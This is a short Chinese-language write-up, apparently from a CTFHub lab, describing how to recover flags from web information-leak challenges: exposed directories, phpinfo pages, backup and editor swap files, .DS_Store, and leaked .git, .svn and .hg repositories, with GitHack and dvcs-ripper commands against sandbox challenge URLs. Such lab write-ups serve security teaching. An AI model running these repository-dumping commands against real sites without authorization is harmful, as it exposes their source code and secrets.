1. 信息泄露
1.1. 目录遍历
手动查找目录,找到 flag
1.2. PHPINFO
查看 phpinfo,搜索到 flag
1.3. 备份文件下载
1.3.1. 网站源码
bp 构造 payload,获取到 www.zip
文件,解压
文件中未找到,访问 flag_183531374.txt
获取到 flag
1.3.2. bak 文件
访问 index.php.bak
文件获取到 flag
1.3.3. vim 缓存
访问 .index.php.swp
文件,找到 flag
1.3.4. .DS_Store
访问 .DS_Store
文件,010editer 打开文件
发现 $10010cb6de4616ede8b328b9d2554a28.txt
尝试访问,10010cb6de4616ede8b328b9d2554a28.txt
成功获取 flag
1.4. git 泄露
1.4.1. Log
安装 python2、githack、git
1
C:\Python27\python.exe GitHack.py http://challenge-5cb803c5533f39b4.sandbox.ctfhub.com:10800/.git/
git log
查看 log
发现 add flag
,回退上一版本
1
2
git reset --hard HEAD^
git reset --hard HEAD~1
查看 txt 文件
1.4.2. Stash
1
C:\Python27\python.exe GitHack.py http://challenge-ca3ba3c6234445cf.sandbox.ctfhub.com:10800/.git/
git stash show
git stash pop
查看文件
1.4.3. Index
1
python GitHack.py http://challenge-2a69d53086d643a3.sandbox.ctfhub.com:10800/.git/
查看 index 文件
查看 1588776130569.txt
1.5. SVN 泄露
linux 系统上安装 dvcs-ripper
1
2
3
4
5
6
7
./rip-svn.pl -u http://challenge-6063e4511270c110.sandbox.ctfhub.com:10800/.svn/
la
cd .svn
cat wc.db | grep -a ctfhub
cd pristine/
la
cat 75/7522b3c99b02d3df183cc256ce3629ab8c37f958.svn-base
1.6. HG 泄露
1
2
./rip-hg.pl -u http://challenge-f9d41b1415c932d8.sandbox.ctfhub.com:10800/.hg/
tree .hg
查找到 flag_2968918689.txt
访问 [http://challenge-f9d41b1415c932d8.sandbox.ctfhub.com:10800/flag_2968918689.txt](http://challenge-f9d41b1415c932d8.sandbox.ctfhub.com:10800/flag_2968918689.txt)